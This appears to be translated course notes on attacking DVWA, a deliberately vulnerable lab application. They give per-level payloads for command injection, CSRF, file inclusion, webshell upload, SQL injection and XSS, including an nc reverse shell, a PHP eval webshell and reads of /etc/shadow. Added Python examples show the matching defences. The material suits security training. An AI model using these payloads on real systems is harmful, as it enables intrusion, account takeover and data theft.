Officer, give me a chance

Environment setup

NetEase's white-hat hands-on course is built on DVWA; phpstudy makes it easy to set up.

DVWA website: http://www.dvwa.co.uk/

phpstudy website: http://www.phpstudy.net/

Course details: http://mooc.study.163.com/smartSpec/detail/1001227001.htm

Brute Force

Generating a dictionary

  • Use cewl to generate a keyword file from the site:

cewl -H 'Cookie:security=low; PHPSESSID=5bim5pkm2df3u4d55rrbki60m2' -w cewl_dvwa.txt -m 4 http://192.168.56.101/DVWA/vulnerabilities/brute/

  • Hand-tune the keyword file

  • Use john to generate the dictionary:

john --wordlist=cewl_dvwa.txt --rules --stdout > john_dvwa.txt

Running the brute force

Tools:

  • Burp Suite
  • OWASP ZAP
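
Added example, not part of the original notes and not DVWA's code: the server-side control that makes the cewl/john wordlist run above stop paying off, a sliding-window failed-login limiter. LoginGuard, attempt_login and the wordlist replay are assumptions for this example; the wordlist and timestamps are constructed.

```python
"""Sliding-window failed-login limiter (added example, not DVWA's code)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta


class LoginGuard:
    """Counts failed logins per (client IP, username) inside a sliding window
    and locks that pair out once the threshold is reached."""

    def __init__(self, max_failures=5, window=timedelta(minutes=1),
                 lockout=timedelta(minutes=15)):
        self.max_failures = max_failures
        self.window = window
        self.lockout = lockout
        self._failures = defaultdict(deque)   # key -> timestamps of failures
        self._locked_until = {}               # key -> datetime

    @staticmethod
    def _key(ip, username):
        return (ip, username.lower())

    def is_locked(self, ip, username, now):
        until = self._locked_until.get(self._key(ip, username))
        return until is not None and now < until

    def record_failure(self, ip, username, now):
        key = self._key(ip, username)
        q = self._failures[key]
        q.append(now)
        while q and now - q[0] > self.window:   # forget failures outside the window
            q.popleft()
        if len(q) >= self.max_failures:
            self._locked_until[key] = now + self.lockout
            q.clear()

    def record_success(self, ip, username):
        key = self._key(ip, username)
        self._failures.pop(key, None)
        self._locked_until.pop(key, None)


def attempt_login(guard, ip, username, password, now, check_password):
    """Returns 'locked', 'ok' or 'fail'. The guard is consulted before the
    password is checked, so a locked-out client learns nothing about validity."""
    if guard.is_locked(ip, username, now):
        return "locked"
    if check_password(username, password):
        guard.record_success(ip, username)
        return "ok"
    guard.record_failure(ip, username, now)
    return "fail"


def simulate_wordlist_attack(words, correct="password"):
    """Replays a constructed wordlist (think john_dvwa.txt) against the guard
    from one IP, one attempt per second; returns the outcome of each attempt."""
    guard = LoginGuard(max_failures=5)
    t0 = datetime(2024, 1, 1, 10, 0, 0)
    check = lambda u, p: u == "admin" and p == correct   # stand-in credential check
    return [attempt_login(guard, "192.168.56.1", "admin", w,
                          t0 + timedelta(seconds=i), check)
            for i, w in enumerate(words)]


def lockout_timeline(max_failures=3, lockout_seconds=10):
    """Returns (locked right after the failures, locked after the lockout expired)."""
    guard = LoginGuard(max_failures=max_failures,
                       lockout=timedelta(seconds=lockout_seconds))
    t = datetime(2024, 1, 1, 10, 0, 0)
    for _ in range(max_failures):
        guard.record_failure("192.168.56.1", "admin", t)
    return (guard.is_locked("192.168.56.1", "admin", t + timedelta(seconds=1)),
            guard.is_locked("192.168.56.1", "admin",
                            t + timedelta(seconds=lockout_seconds + 1)))


if __name__ == "__main__":
    # Constructed wordlist: the real password is the 8th entry, but the guard
    # locks the account after 5 failures, so it is never tried.
    words = ["dvwa", "Dvwa1", "brute", "Brute!", "hacker", "force", "Force2", "password"]
    print(simulate_wordlist_attack(words))
    print(lockout_timeline())
```

The lockout is keyed on IP plus username so one noisy client cannot lock every account, and the guard answers before the credential check so the response timing does not leak which passwords were actually tested.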

Command Injection

Low level

127.0.0.1&&net user

Medium level

## Bypass 1
127.0.0.1&net user
## Bypass 2
127.0.0.1&;&ipconfig

High level

127.0.0.1|net user

EXP

Double-quote bypass

net user <=> n""et us""er

Time-based injection

## windows
ping 127.0.0.1 -n 5 > nul
## linux
sleep 5

Outbound requests

## windows
ping, telnet
## linux
wget, curl

Getting a shell through Linux command injection

## On the public-facing server
nc -lp 1691 -v

## Command injected on the victim server
nc.traditional -e /bin/bash <public-server-IP> 1691 &
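
Added example, not DVWA's own code: the Medium-level separator blacklist modelled in Python, so it is visible why `&;&` survives it, next to the fix that makes every payload in this section inert: validate the parameter as an IP address and run ping with an argument list instead of a shell string. Function names are assumptions for this example.

```python
"""Blacklist vs. allowlist for the ping target (added example, not DVWA's code)."""
import ipaddress
import platform
import subprocess


def medium_blacklist(target):
    """Models DVWA Medium's str_replace(array('&&', ';'), '', $target): each
    listed substring is removed in one pass, in order. '&;&' contains no '&&'
    during the first pass, loses its ';' in the second and comes out as '&&'."""
    for bad in ("&&", ";"):
        target = target.replace(bad, "")
    return target


def validate_target(target):
    """Allowlist: the value must parse as an IPv4 or IPv6 address and nothing
    else. No separator list is needed because none of them can parse.
    Returns the normalised address or raises ValueError."""
    return str(ipaddress.ip_address(target.strip()))


def is_rejected(target):
    try:
        validate_target(target)
    except ValueError:
        return True
    return False


def build_ping_argv(target):
    """Argument vector, never a shell string: subprocess.run with a list does
    not go through /bin/sh or cmd.exe, so '&', '|' and ';' have no meaning."""
    addr = validate_target(target)
    count_flag = "-n" if platform.system() == "Windows" else "-c"
    return ["ping", count_flag, "3", addr]


def ping(target):
    argv = build_ping_argv(target)   # raises ValueError before anything runs
    return subprocess.run(argv, capture_output=True, text=True, timeout=20).stdout


# The payloads from this section, used here only as rejection test input.
PAGE_PAYLOADS = [
    "127.0.0.1&&net user",
    "127.0.0.1&net user",
    "127.0.0.1&;&ipconfig",
    "127.0.0.1|net user",
    '127.0.0.1&&n""et us""er',
]

if __name__ == "__main__":
    for p in PAGE_PAYLOADS:
        print(f"{p!r:32} blacklist -> {medium_blacklist(p)!r:28} allowlist rejects: {is_rejected(p)}")
    print(build_ping_argv("127.0.0.1"))
```

The blacklist output shows the problem in one line: the filtered string is still a valid command line. The allowlist has no such gap, and because the binary is invoked with an argv list, a future bypass of the validator would still not reach a shell.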

Cross-Site Request Forgery (CSRF)

<html>
<head></head>
<body>
<form action="http://192.168.56.101/DVWA/vulnerabilities/csrf" method="GET">
<input name="password_new" type="hidden" value="hacker">
<input name="password_conf" type="hidden" value="hacker">
<input value="Click Me" name="Change" type="submit">
</form>
</body>
</html>

<img src="http://192.168.56.101/DVWA/vulnerabilities/csrf/?password_new=hacker&password_conf=hacker&Change=Change" border="0" style="display:none;"/>

<h1>404</h1>

<h2>file not found.</h2>
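
Added example, not DVWA's own code: a password-change handler with a per-session CSRF token, fed the exact request the hidden form and image above make the browser send. Session, Request and change_password are assumptions for this example; only the forged URL comes from the notes.

```python
"""CSRF token check against the forged request (added example, not DVWA's code)."""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qsl, urlsplit


@dataclass
class Session:
    # Random per-session token; another origin cannot read it.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


@dataclass
class Request:
    method: str
    params: dict


def request_from_url(url, method="GET"):
    """The request a cross-site <img> or auto-submitted form produces: only
    what is in the query string, which is all the attacker's page can supply."""
    return Request(method, dict(parse_qsl(urlsplit(url).query)))


def change_password(session, request):
    """Returns (status, message). State changes are POST-only, the token is
    compared in constant time, and the check runs before any other logic."""
    if request.method != "POST":
        return 405, "state change must be a POST"
    token = request.params.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return 403, "CSRF token missing or invalid"
    new = request.params.get("password_new", "")
    if not new or new != request.params.get("password_conf"):
        return 400, "passwords do not match"
    # ... persist the new password here ...
    return 200, "password changed"


def render_form(session):
    """The legitimate form carries the session's token as a hidden field."""
    return ('<form action="/DVWA/vulnerabilities/csrf" method="POST">'
            f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
            '<input type="password" name="password_new">'
            '<input type="password" name="password_conf">'
            '<input type="submit" name="Change" value="Change"></form>')


# The forged request from the notes above.
FORGED_URL = ("http://192.168.56.101/DVWA/vulnerabilities/csrf/"
              "?password_new=hacker&password_conf=hacker&Change=Change")

if __name__ == "__main__":
    s = Session()
    print(change_password(s, request_from_url(FORGED_URL)))           # 405
    print(change_password(s, request_from_url(FORGED_URL, "POST")))   # 403
    legit = Request("POST", {"csrf_token": s.csrf_token,
                             "password_new": "s3cret", "password_conf": "s3cret"})
    print(change_password(s, legit))                                  # 200
```

Requiring POST alone would not be enough (the attacker's form could be switched to `method="POST"`); the token is what the cross-site page cannot obtain. A SameSite cookie attribute is a complementary layer, not a replacement for the token.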

File Inclusion

Low level

Local file inclusion

## linux
http://192.168.56.101/DVWA/vulnerabilities/fi/?page=/etc/shadow
## windows
http://192.168.56.101/DVWA/vulnerabilities/fi/?page=C:\Windows\win.ini

Remote file inclusion

http://192.168.56.101/DVWA/vulnerabilities/fi/?page=http://xxx.xxx.xxx.xxx/phpinfo.txt

## http://xxx.xxx.xxx.xxx/phpinfo.txt
<?php
phpinfo();
?>

Medium level

Local file inclusion is unaffected.

Remote file inclusion: double-write http:// to get past the replacement rule.

http://192.168.56.101/DVWA/vulnerabilities/fi/?page=htthttp://p://xxx.xxx.xxx.xxx/phpinfo.txt

High level

Use the file protocol to bypass the protection.

Needs to be combined with a file upload vulnerability.

http://192.168.56.101/DVWA/vulnerabilities/fi/?page=file://C:\Windows/win.ini
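
Added example, not DVWA's own code: the Medium-level scheme stripping modelled so the double-write above can be seen re-forming `http://`, beside an allowlist resolver that accepts only known page names and a path-containment check for cases where the name cannot be a fixed set. The allowlist entries and base directory are placeholders, not DVWA's real layout.

```python
"""Scheme-stripping filter vs. allowlist include (added example, not DVWA's code)."""
from pathlib import Path


def medium_filter(page):
    """Models DVWA Medium's str_replace(array("http://", "https://"), "", $page):
    one pass per scheme, so 'htthttp://p://' loses its middle and is 'http://' again."""
    for scheme in ("http://", "https://"):
        page = page.replace(scheme, "")
    return page


# Placeholder allowlist standing in for the application's real page names.
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}
BASE_DIR = "/srv/app/pages"   # placeholder, not DVWA's path


def resolve_page(page, base_dir=BASE_DIR):
    """Allowlist: the parameter must equal one of the known names exactly.
    No scheme, drive letter or path separator can survive an exact-match
    comparison, so there is nothing to strip. Returns the path to include."""
    if page not in ALLOWED_PAGES:
        raise ValueError(f"page not allowed: {page!r}")
    return Path(base_dir) / page


def is_within(base_dir, candidate):
    """Defence in depth when names are dynamic: resolve both sides and require
    the candidate to stay under base_dir. An absolute candidate replaces the
    base when joined, which is exactly why the check has to happen after joining."""
    base = Path(base_dir).resolve()
    target = (base / candidate).resolve()
    return target == base or base in target.parents


def is_rejected(page):
    try:
        resolve_page(page)
    except ValueError:
        return True
    return False


# The ?page= values from this section, used here only as rejection test input.
PAGE_PAYLOADS = [
    "/etc/shadow",
    "C:\\Windows\\win.ini",
    "http://xxx.xxx.xxx.xxx/phpinfo.txt",
    "htthttp://p://xxx.xxx.xxx.xxx/phpinfo.txt",
    "file://C:\\Windows/win.ini",
]

if __name__ == "__main__":
    for p in PAGE_PAYLOADS:
        print(f"{p!r:45} after filter: {medium_filter(p)!r:40} allowlist rejects: {is_rejected(p)}")
    print(resolve_page("file1.php"))
    print(is_within(BASE_DIR, "file1.php"), is_within(BASE_DIR, "../../etc/shadow"))
```

The filter output shows that a removal-based filter is only as good as its single pass; the allowlist never inspects the string for bad parts, it only asks whether the whole value is a good one. Disabling `allow_url_include` in php.ini closes the remote variant independently of either check.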

File Upload

Recommended tool: open-source Caidao (China Chopper)

https://github.com/Chora10/Cknife

Low level

One-line webshell + Caidao

1.php

<?php
@eval($_POST['webshell']);
?>

Medium level

File inclusion + file upload

mv 1.php 1.jpg

Because DVWA requires a login, add the Cookie header to the request before connecting with Caidao.

http://192.168.56.101/DVWA/vulnerabilities/fi/?page=hthttp://tp://192.168.56.101/DVWA/hackable/uploads/1.p.jpg

High level

Building an image webshell

Windows command:

copy 1.jpg/b+1.php 1.php.jpg

EXP

A <?php phpinfo(); ?> shell combined with the file inclusion vulnerability reveals the physical path.
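
Added example, not DVWA's own code: an upload check that turns away each of the three artefacts this section builds (the bare 1.php, the renamed 1.jpg, and the `copy /b` polyglot), and stores what passes under a random name. The function names are assumptions; the byte strings are constructed stand-ins for the files.

```python
"""Upload validation against webshell, rename and polyglot (added example, not DVWA's code)."""
import os
import secrets
from pathlib import Path

# Extension -> accepted leading bytes (file signatures).
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
SCRIPT_EXTS = {".php", ".phtml", ".php3", ".php5", ".phar"}
# Heuristic only: catches the plain polyglot from this section, not every encoding.
PHP_MARKERS = (b"<?php", b"<?=")


def check_upload(filename, data):
    """Returns None when the upload is acceptable, otherwise the reason it is not."""
    name = os.path.basename(filename.replace("\\", "/"))
    suffixes = [s.lower() for s in Path(name).suffixes]   # '1.php.jpg' -> ['.php', '.jpg']
    if not suffixes or suffixes[-1] not in MAGIC:
        return "extension not allowed"
    if any(s in SCRIPT_EXTS for s in suffixes[:-1]):
        return "script extension inside filename"
    if not any(data.startswith(m) for m in MAGIC[suffixes[-1]]):
        return "content does not match extension"
    if any(m in data for m in PHP_MARKERS):
        return "embedded PHP code"
    return None


def safe_name(filename):
    """Random server-side name; the client's name never reaches the filesystem."""
    return secrets.token_hex(16) + Path(filename).suffix.lower()


def store_upload(filename, data, upload_dir):
    reason = check_upload(filename, data)
    if reason is not None:
        raise ValueError(reason)
    dest = Path(upload_dir) / safe_name(filename)
    dest.write_bytes(data)
    return dest


# Constructed samples mirroring the section's three artefacts.
WEBSHELL = b"<?php\n@eval($_POST['webshell']);\n?>"
JPEG_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
POLYGLOT = JPEG_HEADER + b"\x00" * 32 + b"<?php phpinfo(); ?>"   # copy /b 1.jpg+1.php
CLEAN_IMAGE = JPEG_HEADER + b"\x00" * 32

if __name__ == "__main__":
    for fname, blob in [("1.php", WEBSHELL), ("1.jpg", WEBSHELL),
                        ("1.php.jpg", POLYGLOT), ("photo.jpg", POLYGLOT),
                        ("cat.jpg", CLEAN_IMAGE)]:
        print(f"{fname:12} -> {check_upload(fname, blob)}")
```

The marker scan is the weakest layer here and is easy to evade with other encodings; what actually closes the High-level case is the combination of a random server-side name, a storage directory outside the web root (or one where PHP execution is disabled), and an include handler that never takes a user-controlled path.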

SQL Injection (with echoed results)

Low level

?id=1'

?id=1' and '1'='1

?id=1' and '1'='2

?id=1' union select 1,2--

?id=1' union select 1,database()--

?id=1' union select 1,table_name from information_schema.tables where table_schema='dvwa'--

?id=1' union select 1,column_name from information_schema.columns where table_name='users'--

?id=1' union select user,password from users--

Medium level

The request was changed to POST => inject with Burp Suite.

The ' (single quote) character is filtered => table names must be hex-encoded.

High level

Same as the Low level.

With sqlmap, the --second-order= parameter must be set.

SQL Injection (Blind)

Manual blind injection

ASCII range of a single character: 0-127

?id=1'

?id=1' and '1'='1

?id=1' and '1'='2

?id=1' and length(database())>1--

?id=1' and length(database())=4--

?id=1' and ascii(substr(database(),1,1))>64--

?id=1' and ascii(substr(database(),1,1))>96--

?id=1' and ascii(substr(database(),1,1))>112--

?id=1' and ascii(substr(database(),1,1))>99--

?id=1' and ascii(substr(database(),1,1))=100--


?id=1' and ascii(substr(database(),2,1))>64--

...

?id=1' and ascii(substr(database(),3,1))>64--

...

?id=1' and ascii(substr(database(),4,1))>64--

...

Detailed manual blind injection walkthrough: http://www.freebuf.com/articles/web/120985.html

High level sqlmap command

sqlmap -u 'http://192.168.56.101/DVWA/vulnerabilities/sqli_blind/cookie-input.php#' --cookie='id=1; security=high; PHPSESSID=65qich1muubkouce3c83acia70' --data='id=1&Submit=Submit' --second-order='http://192.168.56.101/DVWA/vulnerabilities/sqli_blind/' -D dvwa --tables
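
Added example, not DVWA's own code, serving both this section and the echoed-injection section above: the Low-level query with the id spliced into the SQL text, modelled against an in-memory sqlite3 table, beside the parameterised form. It shows the union in the echoed case returning the users table, and the blind case's true/false oracle (`'1'='1` vs `'1'='2`) collapsing to identical responses once the value is a bound parameter. The table rows and password placeholders are constructed; `database()` and `information_schema` are MySQL-specific, so those probes are not reproduced here.

```python
"""Spliced vs. parameterised lookup (added example, not DVWA's code)."""
import sqlite3


def make_db():
    """Stand-in for DVWA's users table with constructed rows; the password
    column holds placeholders, not real hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                 "last_name TEXT, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "admin", "admin", "admin", "<hash-of-admin-password>"),
        (2, "Gordon", "Brown", "gordonb", "<hash-of-gordonb-password>"),
    ])
    return conn


def vulnerable_lookup(conn, user_id):
    """Models DVWA Low: the parameter becomes part of the SQL text, so a quote
    ends the literal and the rest is parsed as SQL. Syntax errors are returned
    as a string, mirroring the error page the ?id=1' probe relies on."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as e:
        return f"SQL error: {e}"


def safe_lookup(conn, user_id):
    """Bound parameter: the whole value is compared against user_id as data.
    There is no SQL to break out of, so no error, no union and no oracle."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


# Probes from the two sections above, reused here only as test input.
PROBES = [
    "1'",
    "1' and '1'='1",
    "1' and '1'='2",
    "1' union select user,password from users--",
]

if __name__ == "__main__":
    conn = make_db()
    for p in PROBES:
        print(f"{p!r:48}\n  spliced : {vulnerable_lookup(conn, p)}\n  bound   : {safe_lookup(conn, p)}")
```

For the blind section the point is the last two `bound` lines: both boolean probes return an empty result, so there is no difference in the response to bit out one character at a time. The same reasoning applies to the time-based variant; a bound parameter never reaches the parser as code.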

Cross-Site Scripting (XSS)

Low level

<script>alert(1)</script>

http://192.168.56.101/DVWA/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E#

Medium level

Double-write bypass

<sc<script>ript>alert(1)</script>

http://192.168.56.101/DVWA/vulnerabilities/xss_r/?name=%3Csc%3Cscript%3Eript%3Ealert%281%29%3C%2Fscript%3E#

Mixed-case bypass

<ScRipt>alert(1)</script>

http://192.168.56.101/DVWA/vulnerabilities/xss_r/?name=%3CScRipt%3Ealert%281%29%3C%2Fscript%3E#

High level

Tag event handler bypass

<img src='x' onerror=alert(1)>

http://192.168.56.101/DVWA/vulnerabilities/xss_r/?name=%3Cimg+src%3D%27x%27+onerror%3Dalert%281%29%3E#

List of HTML event attributes: http://www.w3school.com.cn/tags/html_ref_eventattributes.asp
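
Added example, not DVWA's own code: the Medium-level `<script>` removal and the High-level regex modelled so each bypass in this section can be seen passing through them, beside the actual fix, encoding the value for the HTML text context it is written into. The regex is my reading of DVWA's High-level filter and the `render_safe` template is an assumption for this example.

```python
"""Tag-stripping filters vs. output encoding (added example, not DVWA's code)."""
import html
import re


def medium_filter(name):
    """Models DVWA Medium: str_replace('<script>', '', $name). One pass and
    case-sensitive, so '<sc<script>ript>' closes up into '<script>' and
    '<ScRipt>' is never matched at all."""
    return name.replace("<script>", "")


def high_filter(name):
    """Models DVWA High: preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name).
    Any casing or splitting of 'script' is removed, but '<img ... onerror=...>'
    contains no s..c..r..i..p..t sequence and passes untouched."""
    return re.sub(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", "", name, flags=re.IGNORECASE)


def render_safe(name):
    """Output encoding for an HTML text node: <, >, &, ' and " become entities,
    so whatever the value contains is displayed as text, never parsed as markup.
    There is no list of bad tags to keep up to date."""
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"


def encoded_part(rendered):
    """The user-controlled portion of render_safe's output, for inspection."""
    return rendered[len("<pre>Hello "):-len("</pre>")]


# Payloads from this section, reused here only as test input.
PAGE_PAYLOADS = [
    "<script>alert(1)</script>",
    "<sc<script>ript>alert(1)</script>",
    "<ScRipt>alert(1)</script>",
    "<img src='x' onerror=alert(1)>",
]

if __name__ == "__main__":
    for p in PAGE_PAYLOADS:
        print(f"{p!r}\n  medium : {medium_filter(p)!r}\n  high   : {high_filter(p)!r}"
              f"\n  encoded: {render_safe(p)!r}")
```

The encoding has to match the context: `html.escape` is right for a text node or a quoted attribute value, but a value landing inside a `<script>` block or a URL needs that context's encoding instead. Removing bad input is open-ended; encoding output for its context is not.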

Further reading